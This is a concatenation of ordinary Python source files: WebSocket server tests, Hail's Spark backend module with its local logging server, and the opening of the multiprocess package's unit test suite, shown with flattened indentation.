class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.close", "text": "123"})
async def get_data(url):
async with websockets.connect(url) as websocket:
data = await websocket.recv()
is_open = True
try:
await websocket.recv()
except:
is_open = False
return (data, is_open)
with run_server(App) as url:
loop = asyncio.new_event_loop()
(data, is_open) = loop.run_until_complete(get_data(url))
assert data == "123"
assert not is_open
loop.close()
def test_send_text_data_to_server():
class App(WebSocketResponse):
persist = True
async def websocket_connect(self, message):
await self.send({"type": "websocket.accept"})
async def websocket_receive(self, message):
_text = message.get("text")
await self.send({"type": "websocket.send", "text": _text})
async def send_text(url):
async with websockets.connect(url) as websocket:
await websocket.send("abc")
return await websocket.recv()
with run_server(App) as url:
loop = asyncio.new_event_loop()
data = loop.run_until_complete(send_text(url))
assert data == "abc"
loop.close()
def test_send_binary_data_to_server():
class App(WebSocketResponse):
persist = True
async def websocket_connect(self, message):
await self.send({"type": "websocket.accept"})
async def websocket_receive(self, message):
_bytes = message.get("bytes")
await self.send({"type": "websocket.send", "bytes": _bytes})
async def send_text(url):
async with websockets.connect(url) as websocket:
await websocket.send(b"abc")
return await websocket.recv()
with run_server(App) as url:
loop = asyncio.new_event_loop()
data = loop.run_until_complete(send_text(url))
assert data == b"abc"
loop.close()
def test_send_after_protocol_close():
class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.close", "text": "123"})
with pytest.raises(Exception):
await self.send({"type": "websocket.send", "text": "1234"})
async def get_data(url):
async with websockets.connect(url) as websocket:
data = await websocket.recv()
is_open = True
try:
await websocket.recv()
except:
is_open = False
return (data, is_open)
with run_server(App) as url:
loop = asyncio.new_event_loop()
(data, is_open) = loop.run_until_complete(get_data(url))
assert data == "123"
assert not is_open
loop.close()
def test_subprotocols():
class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.accept", "subprotocol": "proto1"})
async def get_subprotocol(url):
async with websockets.connect(
url, subprotocols=["proto1", "proto2"]
) as websocket:
return websocket.subprotocol
with run_server(App) as url:
loop = asyncio.new_event_loop()
subprotocol = loop.run_until_complete(get_subprotocol(url))
assert subprotocol == "proto1"
loop.close()
|
spark_backend.py
|
import pkg_resources
import sys
import os
import json
import socket
import socketserver
from threading import Thread
import py4j
import pyspark
from typing import List
import hail as hl
from hail.utils.java import Env, scala_package_object, scala_object
from hail.expr.types import dtype
from hail.expr.table_type import ttable
from hail.expr.matrix_type import tmatrix
from hail.expr.blockmatrix_type import tblockmatrix
from hail.ir.renderer import CSERenderer
from hail.ir import JavaIR
from hail.table import Table
from hail.matrixtable import MatrixTable
from .py4j_backend import Py4JBackend, handle_java_exception
from ..hail_logging import Logger
if pyspark.__version__ < '3' and sys.version_info > (3, 8):
raise EnvironmentError('Hail with spark {} requires Python 3.7, found {}.{}'.format(
pyspark.__version__, sys.version_info.major, sys.version_info.minor))
_installed = False
_original = None
def install_exception_handler():
global _installed
global _original
if not _installed:
_original = py4j.protocol.get_return_value
_installed = True
# The original `get_return_value` is not patched, it's idempotent.
patched = handle_java_exception(_original)
# only patch the one used in py4j.java_gateway (call Java API)
py4j.java_gateway.get_return_value = patched
def uninstall_exception_handler():
global _installed
global _original
if _installed:
_installed = False
py4j.protocol.get_return_value = _original
class LoggingTCPHandler(socketserver.StreamRequestHandler):
def handle(self):
for line in self.rfile:
sys.stderr.write(line.decode("ISO-8859-1"))
class SimpleServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
daemon_threads = True
allow_reuse_address = True
def __init__(self, server_address, handler_class):
socketserver.TCPServer.__init__(self, server_address, handler_class)
def connect_logger(utils_package_object, host, port):
"""
This method starts a simple server which listens on a port for a
client to connect and start writing messages. Whenever a message
is received, it is written to sys.stderr. The server is run in
a daemon thread from the caller, which is killed when the caller
thread dies.
If the socket is in use, then the server tries to listen on the
next port (port + 1). After 25 tries, it gives up.
:param str host: Hostname for server.
:param int port: Port to listen on.
"""
server = None
tries = 0
max_tries = 25
while not server:
try:
server = SimpleServer((host, port), LoggingTCPHandler)
except socket.error:
port += 1
tries += 1
if tries >= max_tries:
sys.stderr.write(
                    'WARNING: Could not find a free port for logger, maximum retries {} exceeded.\n'.format(max_tries))
return
t = Thread(target=server.serve_forever, args=())
# The thread should be a daemon so that it shuts down when the parent thread is killed
t.daemon = True
t.start()
utils_package_object.addSocketAppender(host, port)
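# Hedged local sketch, not part of Hail itself: exercises SimpleServer and
# LoggingTCPHandler without a JVM.  Port 0 asks the OS for a free port; the
# message text is illustrative only.
def _example_logging_server():
    server = SimpleServer(('127.0.0.1', 0), LoggingTCPHandler)
    t = Thread(target=server.serve_forever)
    t.daemon = True
    t.start()
    # Anything written to the socket is echoed, line by line, to sys.stderr.
    with socket.create_connection(server.server_address) as conn:
        conn.sendall(b'hello from the logging example\n')
    server.shutdown()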
class Log4jLogger(Logger):
def __init__(self, log_pkg):
self._log_pkg = log_pkg
def error(self, msg):
self._log_pkg.error(msg)
def warning(self, msg):
self._log_pkg.warn(msg)
def info(self, msg):
self._log_pkg.info(msg)
class SparkBackend(Py4JBackend):
def __init__(self, idempotent, sc, spark_conf, app_name, master,
local, log, quiet, append, min_block_size,
branching_factor, tmpdir, local_tmpdir, skip_logging_configuration, optimizer_iterations):
super(SparkBackend, self).__init__()
if pkg_resources.resource_exists(__name__, "hail-all-spark.jar"):
hail_jar_path = pkg_resources.resource_filename(__name__, "hail-all-spark.jar")
assert os.path.exists(hail_jar_path), f'{hail_jar_path} does not exist'
conf = pyspark.SparkConf()
base_conf = spark_conf or {}
for k, v in base_conf.items():
conf.set(k, v)
jars = [hail_jar_path]
if os.environ.get('HAIL_SPARK_MONITOR') or os.environ.get('AZURE_SPARK') == '1':
import sparkmonitor
jars.append(os.path.join(os.path.dirname(sparkmonitor.__file__), 'listener.jar'))
conf.set("spark.extraListeners", "sparkmonitor.listener.JupyterSparkMonitorListener")
conf.set('spark.jars', ','.join(jars))
if os.environ.get('AZURE_SPARK') == '1':
print('AZURE_SPARK environment variable is set to "1", assuming you are in HDInsight.')
# Setting extraClassPath in HDInsight overrides the classpath entirely so you can't
# load the Scala standard library. Interestingly, setting extraClassPath is not
# necessary in HDInsight.
else:
conf.set('spark.driver.extraClassPath', ','.join(jars))
conf.set('spark.executor.extraClassPath', './hail-all-spark.jar')
if sc is None:
pyspark.SparkContext._ensure_initialized(conf=conf)
elif not quiet:
sys.stderr.write(
'pip-installed Hail requires additional configuration options in Spark referring\n'
' to the path to the Hail Python module directory HAIL_DIR,\n'
' e.g. /path/to/python/site-packages/hail:\n'
' spark.jars=HAIL_DIR/backend/hail-all-spark.jar\n'
' spark.driver.extraClassPath=HAIL_DIR/backend/hail-all-spark.jar\n'
' spark.executor.extraClassPath=./hail-all-spark.jar')
else:
pyspark.SparkContext._ensure_initialized()
self._gateway = pyspark.SparkContext._gateway
self._jvm = pyspark.SparkContext._jvm
hail_package = getattr(self._jvm, 'is').hail
self._hail_package = hail_package
self._utils_package_object = scala_package_object(hail_package.utils)
jsc = sc._jsc.sc() if sc else None
if idempotent:
self._jbackend = hail_package.backend.spark.SparkBackend.getOrCreate(
jsc, app_name, master, local, True, min_block_size, tmpdir, local_tmpdir)
self._jhc = hail_package.HailContext.getOrCreate(
self._jbackend, log, True, append, branching_factor, skip_logging_configuration, optimizer_iterations)
else:
self._jbackend = hail_package.backend.spark.SparkBackend.apply(
jsc, app_name, master, local, True, min_block_size, tmpdir, local_tmpdir)
self._jhc = hail_package.HailContext.apply(
self._jbackend, log, True, append, branching_factor, skip_logging_configuration, optimizer_iterations)
self._jsc = self._jbackend.sc()
if sc:
self.sc = sc
else:
self.sc = pyspark.SparkContext(gateway=self._gateway, jsc=self._jvm.JavaSparkContext(self._jsc))
self._jspark_session = self._jbackend.sparkSession()
self._spark_session = pyspark.sql.SparkSession(self.sc, self._jspark_session)
# This has to go after creating the SparkSession. Unclear why.
# Maybe it does its own patch?
install_exception_handler()
from hail.context import version
py_version = version()
jar_version = self._jhc.version()
if jar_version != py_version:
raise RuntimeError(f"Hail version mismatch between JAR and Python library\n"
f" JAR: {jar_version}\n"
f" Python: {py_version}")
self._fs = None
self._logger = None
if not quiet:
sys.stderr.write('Running on Apache Spark version {}\n'.format(self.sc.version))
if self._jsc.uiWebUrl().isDefined():
sys.stderr.write('SparkUI available at {}\n'.format(self._jsc.uiWebUrl().get()))
connect_logger(self._utils_package_object, 'localhost', 12888)
self._jbackend.startProgressBar()
def jvm(self):
return self._jvm
def hail_package(self):
return self._hail_package
def utils_package_object(self):
return self._utils_package_object
def stop(self):
self._jbackend.close()
self._jhc.stop()
self._jhc = None
self.sc.stop()
self.sc = None
uninstall_exception_handler()
def _parse_value_ir(self, code, ref_map={}, ir_map={}):
return self._jbackend.parse_value_ir(
code,
{k: t._parsable_string() for k, t in ref_map.items()},
ir_map)
def _parse_table_ir(self, code, ref_map={}, ir_map={}):
return self._jbackend.parse_table_ir(code, ref_map, ir_map)
def _parse_matrix_ir(self, code, ref_map={}, ir_map={}):
return self._jbackend.parse_matrix_ir(code, ref_map, ir_map)
def _parse_blockmatrix_ir(self, code, ref_map={}, ir_map={}):
return self._jbackend.parse_blockmatrix_ir(code, ref_map, ir_map)
@property
def logger(self):
if self._logger is None:
self._logger = Log4jLogger(self._utils_package_object)
return self._logger
@property
def fs(self):
if self._fs is None:
from hail.fs.hadoop_fs import HadoopFS
self._fs = HadoopFS(self._utils_package_object, self._jbackend.fs())
return self._fs
def _to_java_ir(self, ir, parse):
if not hasattr(ir, '_jir'):
r = CSERenderer(stop_at_jir=True)
# FIXME parse should be static
ir._jir = parse(r(ir), ir_map=r.jirs)
return ir._jir
def _to_java_value_ir(self, ir):
return self._to_java_ir(ir, self._parse_value_ir)
def _to_java_table_ir(self, ir):
return self._to_java_ir(ir, self._parse_table_ir)
def _to_java_matrix_ir(self, ir):
return self._to_java_ir(ir, self._parse_matrix_ir)
def _to_java_blockmatrix_ir(self, ir):
return self._to_java_ir(ir, self._parse_blockmatrix_ir)
def value_type(self, ir):
jir = self._to_java_value_ir(ir)
return dtype(jir.typ().toString())
def table_type(self, tir):
jir = self._to_java_table_ir(tir)
return ttable._from_java(jir.typ())
def matrix_type(self, mir):
jir = self._to_java_matrix_ir(mir)
return tmatrix._from_java(jir.typ())
def persist_table(self, t, storage_level):
return Table._from_java(self._jbackend.pyPersistTable(storage_level, self._to_java_table_ir(t._tir)))
def unpersist_table(self, t):
return Table._from_java(self._to_java_table_ir(t._tir).pyUnpersist())
def persist_matrix_table(self, mt, storage_level):
return MatrixTable._from_java(self._jbackend.pyPersistMatrix(storage_level, self._to_java_matrix_ir(mt._mir)))
def unpersist_matrix_table(self, mt):
return MatrixTable._from_java(self._to_java_matrix_ir(mt._mir).pyUnpersist())
def unpersist_block_matrix(self, id):
self._jhc.backend().unpersist(id)
def blockmatrix_type(self, bmir):
jir = self._to_java_blockmatrix_ir(bmir)
return tblockmatrix._from_java(jir.typ())
def from_spark(self, df, key):
return Table._from_java(self._jbackend.pyFromDF(df._jdf, key))
def to_spark(self, t, flatten):
t = t.expand_types()
if flatten:
t = t.flatten()
return pyspark.sql.DataFrame(self._jbackend.pyToDF(self._to_java_table_ir(t._tir)),
Env.spark_session()._wrapped)
def add_reference(self, config):
Env.hail().variant.ReferenceGenome.fromJSON(json.dumps(config))
def load_references_from_dataset(self, path):
return json.loads(Env.hail().variant.ReferenceGenome.fromHailDataset(self.fs._jfs, path))
def from_fasta_file(self, name, fasta_file, index_file, x_contigs, y_contigs, mt_contigs, par):
self._jbackend.pyFromFASTAFile(
name, fasta_file, index_file, x_contigs, y_contigs, mt_contigs, par)
def remove_reference(self, name):
Env.hail().variant.ReferenceGenome.removeReference(name)
def get_reference(self, name):
return json.loads(Env.hail().variant.ReferenceGenome.getReference(name).toJSONString())
def add_sequence(self, name, fasta_file, index_file):
self._jbackend.pyAddSequence(name, fasta_file, index_file)
def remove_sequence(self, name):
scala_object(Env.hail().variant, 'ReferenceGenome').removeSequence(name)
def add_liftover(self, name, chain_file, dest_reference_genome):
self._jbackend.pyReferenceAddLiftover(name, chain_file, dest_reference_genome)
def remove_liftover(self, name, dest_reference_genome):
scala_object(Env.hail().variant, 'ReferenceGenome').referenceRemoveLiftover(
name, dest_reference_genome)
def parse_vcf_metadata(self, path):
return json.loads(self._jhc.pyParseVCFMetadataJSON(self.fs._jfs, path))
def index_bgen(self, files, index_file_map, rg, contig_recoding, skip_invalid_loci):
self._jbackend.pyIndexBgen(files, index_file_map, rg, contig_recoding, skip_invalid_loci)
def import_fam(self, path: str, quant_pheno: bool, delimiter: str, missing: str):
return json.loads(self._jbackend.pyImportFam(path, quant_pheno, delimiter, missing))
def register_ir_function(self, name, type_parameters, argument_names, argument_types, return_type, body):
r = CSERenderer(stop_at_jir=True)
code = r(body._ir)
jbody = (self._parse_value_ir(code, ref_map=dict(zip(argument_names, argument_types)), ir_map=r.jirs))
Env.hail().expr.ir.functions.IRFunctionRegistry.pyRegisterIR(
name,
[ta._parsable_string() for ta in type_parameters],
argument_names, [pt._parsable_string() for pt in argument_types],
return_type._parsable_string(),
jbody)
def persist_ir(self, ir):
return JavaIR(self._jhc.backend().executeLiteral(self._to_java_value_ir(ir)))
def read_multiple_matrix_tables(self, paths: 'List[str]', intervals: 'List[hl.Interval]', intervals_type):
json_repr = {
'paths': paths,
'intervals': intervals_type._convert_to_json(intervals),
'intervalPointType': intervals_type.element_type.point_type._parsable_string(),
}
results = self._jhc.backend().pyReadMultipleMatrixTables(json.dumps(json_repr))
return [MatrixTable._from_java(jm) for jm in results]
|
__init__.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle #XXX: use dill?
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
from test.support import hashlib_helper
from test.support import import_helper
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = import_helper.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
import_helper.import_module('multiprocess.synchronize')
import threading
import multiprocess as multiprocessing
import multiprocess.connection
import multiprocess.dummy
import multiprocess.heap
import multiprocess.managers
import multiprocess.pool
import multiprocess.queues
from multiprocess import util
try:
from multiprocess import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocess.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocess import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
    # Since multiprocessing.Process has the same API as threading.Thread
    # (join() and is_alive()), the support function can be reused
threading_helper.join_thread(process)
if os.name == "posix":
from multiprocess import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocess.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
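# Hedged usage sketch, not exercised by the suite itself: the queue and lock
# tests below wrap blocking calls in TimingWrapper so they can assert on both
# the result and roughly how long the call blocked.  The 0.2 s timeout is an
# arbitrary illustration.
def _example_timing_wrapper():
    timed_get = TimingWrapper(pyqueue.Queue().get)
    try:
        timed_get(True, 0.2)      # blocks for ~0.2 s, then raises Empty
    except pyqueue.Empty:
        pass
    return timed_get.elapsed      # approximately 0.2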
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocess.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def _test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
        # its parent (a.k.a. the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocess.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
@unittest.skipIf(True, "fails with is_dill(obj, child=True)")
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(os_helper.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
